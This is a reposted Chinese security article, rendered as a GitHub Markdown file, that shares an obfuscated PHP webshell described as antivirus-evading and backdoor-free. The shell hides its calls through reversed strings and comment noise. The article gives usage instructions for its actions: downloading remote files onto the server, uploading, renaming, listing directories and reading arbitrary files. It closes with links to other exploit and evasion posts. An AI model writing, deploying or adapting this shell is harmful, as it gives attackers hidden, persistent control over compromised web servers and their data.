Skip to content

Latest commit

 

History

History
95 lines (58 loc) · 7.55 KB

分享一个远程免杀无后门小马.md

File metadata and controls

95 lines (58 loc) · 7.55 KB
Raw

本文由 简悦 SimpRead 转码, 原文地址 mp.weixin.qq.com

文章来源: 极安中国 

链接地址:https://bbs.secgeeker.net/thread-1624-1-1.html

免杀马

<?php error_reporting(0);$sr="st"./*+/*+*/"rr"/*+/*+*/."ev";$id=$sr/*+/*+*/("ri"."d_"."si");$rn=$sr/*+/*+*/("em"."an"."er");$dn=$sr/*+/*+*/("em"."anr"."id");$od=$sr/*+/*+*/("ri"."dne"."po");$rd=$sr/*+/*+*/("ri"."dda"."er");$cd=$sr/*+/*+*/("ri"."deso"."lc");$fpc=$sr/*+/*+*/("stn"."etn"."oc_t"."up_e"."lif");$fgc=$sr/*+/*+*/("stn"."etn"."oc_t"."eg_e"."lif");$muf=$sr/*+/*+*/("eli"."f_d"."eda"."olp"."u_e"."vom");$dlform='<form method="post">FN:<input ></form>';if($_GET['act']=='dl'){echo($dlform);if($_SERVER['REQUEST_METHOD']=='POST'){$fpc/*+/*+*/($_POST['fn'],$fgc/*+/*+*/($_POST['url']));}exit;}if($_GET['act']=='ul'){echo($ulform);if($_SERVER['REQUEST_METHOD']=='POST'){$sp=empty($_POST['sp'])?'./':$_POST['sp'].'/';$muf/*+/*+*/($/*+/*+*/{"_F"."IL"."ES"}["uf"]["tmp_name"],$sp.$/*+/*+*/{"_F"."IL"."ES"}["uf"]["name"]);}exit;}if($_GET['act']=='rn'){echo($rnform);if($_SERVER['REQUEST_METHOD']=='POST'){$rn/*+/*+*/($_POST['on'],$_POST['nn']);}exit;}if($_GET['act']=='gp'){echo($dn/*+/*+*/(__FILE__));exit;}if($_GET['act']=='lp'){echo($lpform);if($_SERVER['REQUEST_METHOD']=='POST'){$dp=$_POST['dp'].'/';$h=$od/*+/*+*/($dp);while(($fn=$rd/*+/*+*/($h))!==false){if($id/*+/*+*/($dp.$fn)){$t1.='D '.$fn.'<br>';}else{$t2.='  '.$fn.'<br>';}}$cd/*+/*+*/($dp);echo($dp.'<br>'.$t1.$t2);}exit;}if($_GET['act']=='sf'){echo($sfform);if($_SERVER['REQUEST_METHOD']=='POST'){$df=$_POST['df'];echo('<textarea style="width:100%;height:100%;" wrap="off">'.$fgc/*+/*+*/($df).'</textarea>');}exit;}?>

ReadMe:

远程下载文件:

http://127.0.0.1/1.php?act=dl
FN 保存的文件名
URL下载文件的地址:http://127.0.0.1/111.txt 、123.txt
核心代码:
file_put_contents($fn,file_get_contents($url));

上传文件:
http://127.0.0.1/1.php?act=ul
sp 输入相对路径:./ ../

重命名文件:
http://127.0.0.1/1.php?act=rn
ON 原文件名
NN 新文件名

文件绝对路径
http://127.0.0.1/1.php?act=gp

列目录:
http://127.0.0.1/1.php?act=lp
dp: 路径地址

查看文件内容:
http://127.0.0.1/1.php?act=sf
DF: 路径地址

【往期推荐】

【内网渗透】内网信息收集命令汇总

【内网渗透】域内信息收集命令汇总

【超详细 | Python】CS 免杀 - Shellcode Loader 原理 (python)

【超详细 | Python】CS 免杀 - 分离 + 混淆免杀思路

【超详细】CVE-2020-14882 | Weblogic 未授权命令执行漏洞复现

【超详细 | 附 PoC】CVE-2021-2109 | Weblogic Server 远程代码执行漏洞复现

【漏洞分析 | 附 EXP】CVE-2021-21985 VMware vCenter Server 远程代码执行漏洞

【CNVD-2021-30167 | 附 PoC】用友 NC BeanShell 远程代码执行漏洞复现

【奇淫巧技】如何成为一个合格的 “FOFA” 工程师

记一次 HW 实战笔记 | 艰难的提权爬坑

【超详细】Microsoft Exchange 远程代码执行漏洞复现【CVE-2020-17144】

【超详细】Fastjson1.2.24 反序列化漏洞复现

走过路过的大佬们留个关注再走呗

往期文章有彩蛋哦****

一如既往的学习,一如既往的整理,一如即往的分享。

如侵权请私聊公众号删文

公众号